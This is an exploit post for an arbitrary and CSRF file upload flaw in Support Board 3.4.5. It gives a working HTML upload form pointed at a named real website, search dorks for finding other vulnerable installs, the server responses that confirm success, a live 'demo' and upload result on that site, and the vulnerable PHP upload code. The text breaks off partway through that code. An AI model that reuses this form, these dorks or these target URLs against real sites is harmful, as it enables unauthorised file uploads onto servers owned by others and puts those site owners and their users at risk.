Exploit Title: Support Board 3.4.5 Arbitrary File Upload / CSRF File Upload Author: L4663r666h05t Twitter: https://twitter.com/L4663r666h05t Vendor Homepage: N/A Postfile: file CSRF Code: <form action="https://www.support.angohost.ao/supportboard/include/upload.php" method="post" target="_blank"> <input type="file" name="file"> <input type="submit" name="kill" value=">>"> </form> On Non-WP: /supportboard/include/upload.php Dork For Non-WP: supportboard/uploads/ On WP: /wp-content/plugins/supportboard/supportboard/include/upload.php Dork for WP: /wp-content/plugins/supportboard/supportboard/uploads/ Path file: /supportboard/uploads/(tanggal)/randomname_namafile.jpg /~path/uploads/(tanggal)/randomname_namafile.jpg If vulnerable, upload.php will show this: ["error","Support Board Error: Key file in $_FILES not found."] Demo: https://www.support.angohost.ao/supportboard/include/upload.php Result: https://www.support.angohost.ao/supportboard/uploads/01-03-22/69927_0x.jpg Success upload will show text like: ["success","SB_URL\/uploads\/(timestamp)\/(random)_(your file name).jpg"] vuln code on upload.php: $allowed_extensions = array('json','psd','ai','jpg','jpeg','png','gif','pdf','doc','docx','key','ppt','odt','xls','xlsx','zip','rar','mp3','m4a','ogg','wav','mp4','mov','wmv','avi','mpg','ogv','3gp','3g2','mkv','txt','ico','csv','ttf','font','css','scss'); if (isset($_FILES['file'])) { if (0 < $_FILES['file']['error']) { die(json_encode(array('error', 'Support Board: Error into upload.php file.'))); } else { $file_name = sb_upload_escape($_FILES['file']['name']); $infos = pathinfo($file_name); $directory_date = date('d-m-y'); $path = '../uploads/' . $directory_date; $url = SB_URL . '/uploads/' . $directory_date; if (isset($infos['extension']) && in_array(strtolower($infos['extension']), $allowed_extensions)) { if (defined('SB_UPLOAD_PATH') && SB_UPLOAD_PATH != '' && defined('SB_UPLOAD_URL') && SB_UPLOAD_URL != '') { $path = SB_UPLOAD_PATH . '/' . $directory_date; $url = SB_UPLOAD_URL . '/' . $directory_date; }